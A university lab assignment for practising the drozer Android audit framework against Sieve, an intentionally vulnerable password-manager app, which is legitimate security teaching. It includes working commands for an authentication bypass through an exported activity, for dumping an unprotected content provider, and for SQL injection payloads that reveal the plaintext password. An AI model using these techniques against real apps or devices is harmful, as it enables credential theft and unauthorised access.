Proj 10: Drozer (20 pts)

What You Need for This Project

Purpose

To practice using drozer, "a comprehensive security audit and attack framework for Android", according to its product page.

Drozer allows you to audit IPC endpoints.


Task 1: Installing Drozer

Installing Drozer on Kali

On Kali, in a Terminal, execute these commands:
wget https://github.com/mwrlabs/drozer/releases/download/2.4.4/drozer-2.4.4-py2-none-any.whl

pip install drozer-2.4.4-py2-none-any.whl
Drozer is "successfully installed", as shown below.

Downloading the Drozer Agent

The Drozer agent is an Android app that works with the drozer software on Kali to test app security.

On Kali, in a Terminal, execute these commands:

mkdir drozer
cd drozer
wget https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk
The file downloads, as shown below.

Connecting to your Android Device with ADB

On Kali, in a Terminal, execute these commands, replacing the IP address with the IP address of your Genymotion Android device:
adb connect 172.16.123.154
adb devices -l
You should see your Genymotion device in the "List of devices attached", as shown below.

Installing the Agent on Android

On Kali, in a Terminal, execute this command:
adb install drozer-agent-2.3.4.apk
You see a "Success" message, as shown below.

Port Forwarding

Drozer needs to connect to port 31415 on the Android device, and the easiest way to do that is to forwrd the local port 31415 on Kali to the Android device with adb.

On Kali, in a Terminal, execute this command:

adb forward tcp:31415 tcp:31415
The command completes without errors, as shown below.

Launching the Agent

On your Android device, from the home screen, swipe up from the bottom center up to see all apps.

Launch drozer, as shown below.

In the "drozer" screen, at the lower right, click OFF. Now the "Embedded Server" is "ON", as shown below.


Task 2: Exploring Drozer

Opening the drozer Console

On Kali, in a Terminal, execute these commands:
drozer console connect
help
Drozer starts, as shown below.

On Kali, at the dz> prompt, execute these commands:

help shell
! whoami
As you can see, Drozer allows you to run shellcode on your device, with the permissions of the Drozer agent, which is not root, but a numbered user account. On my device, the account was u0_s102, as shown below.

On Kali, at the dz> prompt, execute this command:

list
A long list of drozer modules appears, as shown below. Drozer is a huge pentesting framework, like Metasploit. As you can see, Drozer allows you to run shellcode on your device, with the permissions of the Drozer agent, which is not root, but a numbered user account. On my device, the account was u0_s102, as shown below.

On Kali, at the dz> prompt, execute this command:

exit

Task 3: Installing Sieve

Installing Sieve

We'll use an intentionally vulnerable app to practice using drozer.

On Kali, in the Terminal, execute these commands.

cd drozer
wget https://github.com/mwrlabs/drozer/releases/download/2.3.4/sieve.apk
adb install sieve.apk
The install fails, saying "NO_MATCHING_ABIS, as shown below.

The problem is that Sieve is an ARM app, but Genymotion is an x86 emulator.

Troubleshooting

If that download link fails, use this alternate command:
wget https://samsclass.info/128/proj/sieve.apk

Installing ARM Translation Libraries

If you are working on an off-campus network, such as a coffeehouse or "Danger Zone" in S214, on your host system, open a Web browser and go to

https://mega.nz/usg=ALkJrhgzajMZiTGuDUTxVBaGBlodOhsZbQ#F!JhcFwKpC!yfhfeUzvIZoSdBgfdZ9Ygg

Download ARM_Translation_Oreo.zip.

Troubleshooting

If that download link fails, use this alternate download link:

https://samsclass.info/128/proj/ARM_Translation_Oreo.zip

Drag the ARM_Translation_Oreo.zip file onto your Android device and drop it there.

A warning message pops up, as shown below. Click OK.

A message says the file was flashed successfully, as shown below. Click OK.

Turn off your Android device and restart it.

Connecting to your Android Device with ADB

Adb lost its connection to the Genymotion device when it restarted, so you must connect it again.

On Kali, in a Terminal, execute these commands, replacing the IP address with the IP address of your Genymotion Android device:

adb connect 172.16.123.154
adb devices -l
You should see your Genymotion device in the "List of devices attached", as shown below.

Installing Sieve Again

On Kali, in the Terminal, and execute this command:
adb install sieve.apk
You see a "Success" message, as shown below.

Putting Passwords into Sieve

On your Android device, from the home screen, swipe up from the bottom center up to see all apps.

Launch Sieve, as shown below.

In the "drozer" screen, at the lower right, click OFF. Now the "Embedded Server" is "ON", as shown below.

A "Welcome!" screen appears, as shown below.

Enter a password of Password12345678 in both fields and click Submit.

On the "Enter PIN" page, enter a PIN of 4567 in both fields and click Submit, as shown below.

In the next page, enter a password of Password12345678 fields and click "Sign in", as shown below.

In the "Your Passwords" page, at the top right, click the + icon.

Enter some test data, as shown below, and click Save.

Don't put any real passwords into this app, of course, because they will be revealed later in the project.


Task 4: Finding Sieve's Attack Surface with Drozer

Launching the Agent

On your Android device, from the home screen, swipe up from the bottom center up to see all apps.

Launch drozer, as shown below.

The "Embedded Server" should be "ON", as shown below.

Retrieving Package Information

On Kali, at the dz> prompt, execute these commands:
adb forward tcp:31415 tcp:31415
drozer console connec
run app.package.list -f sieve 
Drozer finds the path to the sieve app, which is

com.mwr.example.sieve

as shown below.

To see basic package information, on Kali, at the dz> prompt, execute this command:

run app.package.info -a com.mwr.example.sieve
This shows where the app stores data, what permissions it has, and more information, as shown below.

Identifying the Attack Surface

To see what vulnerabilities are exposed through Android’s built-in Inter-Process Communication (IPC) system, on Kali, at the dz> prompt, execute this command:
run app.package.attacksurface com.mwr.example.sieve 
Drozer finds several items "exported" as shown below. These items accept input from other apps, and are possible avenues of exploitation.


Task 5: Auditing Sieve's Activities with Drozer

Launching Activities

To see which activities Sieve exports, on Kali, at the dz> prompt, execute this command:
run app.activity.info -a com.mwr.example.sieve 
Drozer finds several items "exported" as shown below. These items accept input from other apps, and are possible avenues of exploitation.

The "MainLoginActivity" makes sense--the app needs to take input from the keyboard for that.

But what are "FileSelectActivity" and "PWList"? They are both exported, and can be run without any permissions, as indicated by the "Permission: null" message.

Look at your Android Device

On your Android device, click the Home button to see the Home screen, as shown below.

Position the Android device so that it remains visible while you execute the Dozer command below.

Launching PWList

To run the "PWList" activity, on Kali, at the dz> prompt, execute this command:
run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList 
The command runs without errors, as shown below.

On your Android device, the "Your Passwords" page opens, as shown below.

This is an authentication bypass exploit--the Drozer agent did not need your password or PIN to open this screen.

But at this point, we only see usernames, not passwords.


Task 6: Auditing Sieve's Content Providers with Drozer

Reading from Content Providers

The "Attack Surface" said Sieve used two content providers. To get more information about them, on Kali, at the dz> prompt, execute this command:
run app.provider.info -a com.mwr.example.sieve 
Drozer finds two exported content providers: DBContentProvider and FileBackupProvider, as shown below. They don't require any permissions to interact with them, except for the /Keys path in the DBContentProvider.

Finding URIs

Content provider URIs always begin with content:// but the rest is not obvious. Drozer can guess them, however.

On Kali, at the dz> prompt, execute this command:

run scanner.provider.finduris -a com.mwr.example.sieve 
Drozer tries several guesses, and finds three "Accessible content URIs", highlighted in the image below.

We know the /Keys provider requires permissions, but evidently not /Passwords. To run the /Passwords provider, on Kali, at the dz> prompt, execute this command:

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ 
You see your username and encoded password, highlighted in the image below.

The password was unprintable binary data, so Drozer encoded it with Base64. We don't have the plaintext password yet.

Saving a Screen Image

Make sure you can see YOURNAME and the Base64-encoded password string, as shown above.

Save a full-desktop image. On a Mac, press Shift+Commmand+3. On a PC, press Shift+PrntScrn and paste into Paint.

YOU MUST SUBMIT A FULL-SCREEN IMAGE FOR FULL CREDIT!

Save the image with the filename "YOUR NAME Proj 10", replacing "YOUR NAME" with your real name.


Task 7: Exploiting Database-Backed Content Providers with SQL Injection

Triggering a SQL Error

As usual, adding an apostrophe to a request triggers an error message. There are two fields we can inject into: projection and selection.

On Kali, at the dz> prompt, execute these commands:

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
The reply shows"SQLITE_ERROR" messages, including the source code for the query, highlighted in the image below.

Enumerating Table Names

Execute this command to list the table names in the database:
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"
The reply reveals three table names, including Key, highlighted in the image below.

Finding Cleartext Passwords

SQL injection allows us to query the contents of the otherwise protected Key table.

Execute this command:

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"
The reply reveals your plaintext password, as shown below.

Turning in your Project

Email the image to to cnit.128sam@gmail.com with the subject line: Proj 10 from YOUR NAME

Sources

Drozer
drozer user guide

Posted 1-17-19 by Sam Bowne